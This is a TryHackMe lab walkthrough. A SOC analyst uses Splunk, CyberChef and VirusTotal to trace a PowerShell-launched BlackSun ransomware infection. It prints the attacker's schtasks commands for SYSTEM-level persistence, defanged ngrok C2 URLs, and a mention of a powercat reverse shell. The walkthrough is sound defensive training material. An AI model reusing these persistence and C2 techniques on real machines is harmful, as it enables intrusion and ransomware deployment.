PS Eclipse
TryHackMe Challenge Walkthrough
Challenge Overview
You are a SOC Analyst for an MSSP (Managed Security Service Provider) company called TryNotHackMe .
A customer sent an email asking for an analyst to investigate the events that occurred on Keegan’s machine on Monday, May 16th, 2022 . The client noted that the machine is operational, but some files have a weird file extension. The client is worried that there was a ransomware attempt on Keegan’s device.
Your manager has tasked you to check the events in Splunk to determine what occurred in Keegan’s device.
Happy Hunting!
Threat Analysis Summary
Analyst Summary Report
Incident Title
PowerShell-Based Ransomware Deployment on Keegan’s Workstation
Category
Ransomware, Privilege Escalation, C2 Communication
Detection Source
Sysmon, Splunk, PowerShell Logs
Impact
Ransomware deployment (BlackSun) resulting in encrypted files
Investigation Workflow
- Identified initial download of a suspicious PowerShell payload
- Decoded obfuscated base64 PowerShell command using CyberChef
- Tracked binary download and persistence setup via scheduled task
- Verified network IOCs and destination IPs via Splunk and Sysmon Event ID 3
- Analyzed ransomware payload behavior, ransom note creation, and wallpaper modification
Recommendations
- Block ngrok.io domains and similar dynamic DNS services at the firewall/DNS layer
- Monitor PowerShell logs for encoded or obfuscated command-line usage
- Restrict the use of `schtasks.exe` for unprivileged users
- Enable tamper protection and reinforce real-time protection settings in Windows Defender
- Conduct endpoint scans and isolate systems with matching IOCs
Tools Used
- Splunk
- CyberChef
- Virustotal
Key Evidences
- Base64-encoded PowerShell command decoded to reveal payload download and scheduled task creation
- EventCode 3 (Sysmon) network connections from `OUTSTANDING_GUTTER.exe` to `ngrok.io` domains
- EventCode 1 (Sysmon) showing creation and execution of the suspicious binary from PowerShell
- VirusTotal hash analysis confirming `script.ps1` is the `blacksun.ps1` ransomware
- Presence of ransom note saved at: `C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt`
- Wallpaper replacement image dropped at: `C:\Users\Public\Pictures\blacksun.jpg`
Chain Attack Overview
Initial Access
Malicious PowerShell script downloaded and executed
Execution
PowerShell decoded and ran additional payloads
Persistence
Scheduled task created using schtasks.exe, triggered by event ID 777
Privilege Escalation
Scheduled task configured to run as SYSTEM
Defense Evasion
Windows Defender real-time monitoring disabled via PowerShell
Discovery
Not explicitly observed
Credential Access
Not explicitly observed
Exfiltration
Not explicitly observed
Command & Control
Communication with attacker via ngrok.io HTTP/HTTPS tunnels
Impact
Ransomware deployed (blacksun.ps1), ransom note dropped, wallpaper replaced
MITRE ATT&CK Mapping
Phase
ID
Technique
Description
Initial Access
T1204.002
User Execution
User manually ran a malicious PowerShell command
Execution
T1059.001
PowerShell
Used to run payloads, disable Defender, and launch scheduled tasks
Execution
T1053.005
Scheduled Task
Task created to execute binary with SYSTEM privileges
Execution
T1105
Ingress Tool Transfer
Remote file downloaded (OUTSTANDING_GUTTER.exe, script.ps1)
Execution
T1027
Obfuscated Files or Information
PowerShell commands were base64-encoded and obfuscated
Persistence
T1053.005
Scheduled Task
Scheduled task triggered on Event ID 777
Privilege Escalation
T1053.005
Scheduled Task
Task ran as SYSTEM, giving elevated privileges
Defense Evasion
T1562.001
Disable or Modify System Protection
Windows Defender real-time monitoring was disabled
C2
T1071.001
Application Layer Protocol: Web Protocols
C2 communications occurred over HTTP/HTTPS via ngrok
Impact
T1486
Data Encrypted for Impact
blacksun.ps1 ransomware encrypted user files and dropped ransom notes
Reference: [MITRE ATT&CK Navigator] ( https://attack.mitre.org/ )
Q & A
Q1 A suspicious binary was downloaded to the endpoint. What was the name of the binary?
I started by checking available log sources in Splunk — Sysmon was active, so I focused on EventCode 3 (network connections). That gave a solid view of outbound activity.
I set the date date range to 05.16.2022 from 00:00 to 24:00 and ran this query:
Splunk Query:
EventCode=3 | stats count as call by Image, DestinationIp, DestinationPort | table Image, DestinationIp, DestinationPort, call
From the results:
– I found a suspicious executable in C:\Windows\Temp\
– OUTSTANDING_GUTTER.exe made multiple outbound connections over port 443
– I also saw PowerShell making connections to the same destination IP over port 80
That combination was enough to dig deeper.
lets check what Powershell was doing on port 80 and looking on the CommandLine filter we can see a red flag, encoded PS execution
From the results:
– I found a suspicious executable in C:\Windows\Temp\
– OUTSTANDING_GUTTER.exe made multiple outbound connections over port 443
– I also saw PowerShell making connections to the same destination IP over port 80
That combination was enough to dig deeper.
lets check what Powershell was doing on port 80 and looking on the CommandLine filter we can see a red flag, encoded PS execution
Decode it with Cyberchef
– from base64
– then decode text to remove the sort of obfuscation with symbol between every letter
It revealed the command that downloaded the EXE into the Temp folder.
Answer
OUTSTANDING_GUTTER.exe
Q2 What is the address the binary was downloaded from? Add **http://** to your answer & defang the URL.
We already decoded the base64-encoded PowerShell command earlier, and it clearly showed the URL used to download OUTSTANDING_GUTTER.exe.
For safety, we defang the URL by replacing dots and slashes in standard format.
Answer
hxxp[://]886e-181-215-214-32[.]ngrok[.]io/
Q3 What Windows executable was used to download the suspicious binary? Enter full path.
We already know the download was done via PowerShell, and the full path was visible in the initial network event logs and command line output.
Answer
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Q4 What command was executed to configure the suspicious binary to run with elevated privileges?
The decoded PowerShell command told us everything. After disabling Defender, it used wget to download the binary into C:\Windows\Temp, then configured a scheduled task to run it as SYSTEM.
Here’s what the attacker did:
- Used schtasks.exe to create a task named OUTSTANDING_GUTTER.exe
- Set the task to trigger on Event ID 777 in the Application log
- Specified the task to run as SYSTEM using /RU SYSTEM
- Forced creation without prompting using /f
This confirms how the attacker ensured the payload would run with elevated privileges.
Answer
C:\Windows\system32\schtasks.exe” /Create /TN OUTSTANDING_GUTTER.exe /TR C:\Windows\Temp\COUTSTANDING_GUTTER.exe /SC ONEVENT /EC Application /MO *[System/EventID=777] /RU SYSTEM /f
Q5 What permissions will the suspicious binary run as? What was the command to run the binary with elevated privileges? **(Format:** **User + ; + CommandLine)**
From the decoded PowerShell, we already know the scheduled task was created to run **as SYSTEM**.
Later in the chain, the attacker used schtasks.exe /Run to manually trigger that task, which executes the binary under the SYSTEM context.
So, we combine the user (NT AUTHORITY\\SYSTEM) and the exact command line used to run the task:
Answer
NT AUTHORITY\SYSTEM;”C:\Windows\system32\schtasks.exe” /Run /TN OUTSTANDING_GUTTER.exe
Q6 The suspicious binary connected to a remote server. What address did it connect to? Add **http://** to your answer & defang the URL.
To trace the network activity of OUTSTANDING_GUTTER.exe, I filtered for related events and checked the QueryName field. This showed the domain the binary reached out to after execution.
The pattern is similar to the first ngrok domain — just a different subdomain.
ofc defang the URL and we have our answer
Answer
hxxp[://]9030-181-215-214-32[.]ngrok[.]io
Q7 A PowerShell script was downloaded to the same location as the suspicious binary. What was the name of the file?
Since OUTSTANDING_GUTTER.exe was dropped in C:\Windows\Temp, I searched for .ps1 files created in that same folder using:
Splunk Query:
TargetFilename="C:\\Windows\\Temp\\*.ps1" | table TargetFilename | dedup TargetFilename
Only one result came up — script.ps1.
To be sure this was part of the ransomware chain, I checked its hash on VirusTotal:
SHA256: E5429F2E44990B3D4E249C566FBF19741E671C0E40B809F87248D9EC9114BEF9
It was flagged as ransomware, confirming this was our next-stage payload.
Answer
script.ps1
powercat.ps1 used to establish reverse shell
Q8 The malicious script was flagged as malicious. What do you think was the actual name of the malicious script?
The result identified the script as part of the BlackSun ransomware family. So even though the filename was script.ps1, the actual malware name is known.
Answer
blacksun.ps1
Q9 A ransomware note was saved to disk, which can serve as an IOC. What is the full path to which the ransom note was saved?
Knowing the ransomware was BlackSun, I looked for ransom notes — these are typically .txt files and often include “README” in the name.
I filtered for filenames matching BlackSun*.txt and found exactly what we were looking for:
The ransom note was saved in the victim’s Downloads folder under a random subdirectory.
Answer
C:\Users\keegan\Downloads\vasg6b0wmw029hd\BlackSun_README.txt
Q10 The script saved an image file to disk to replace the user's desktop wallpaper, which can also serve as an IOC. What is the full path of the image?
Most ransomware families modify the desktop wallpaper, and BlackSun is no different.
So, we can just look for `*.jpeg OR *.jpg OR *.png`
(if we take a look online about Blacksun we can find that the wallpaper is replaced with blacksun.jpg )
Answer
C:\Users\Public\Pictures\blacksun.jpg
Conclusion
One innocent-looking PowerShell command later, and we’ve got a scheduled task running as SYSTEM, Defender taking a nap, and ransomware dropping in like it owns the place.
The attacker didn’t waste time: base64 obfuscation, ngrok C2, and a second-stage payload (hello, blacksun.ps1) that encrypted everything but the wallpaper — which they helpfully replaced for us. All the usual red flags were waving: shady URLs, encoded scripts, and a blatant disregard for endpoint safety.
If nothing else, it’s a textbook reminder that PowerShell visibility isn’t optional — unless, of course, you enjoy surprise encryption.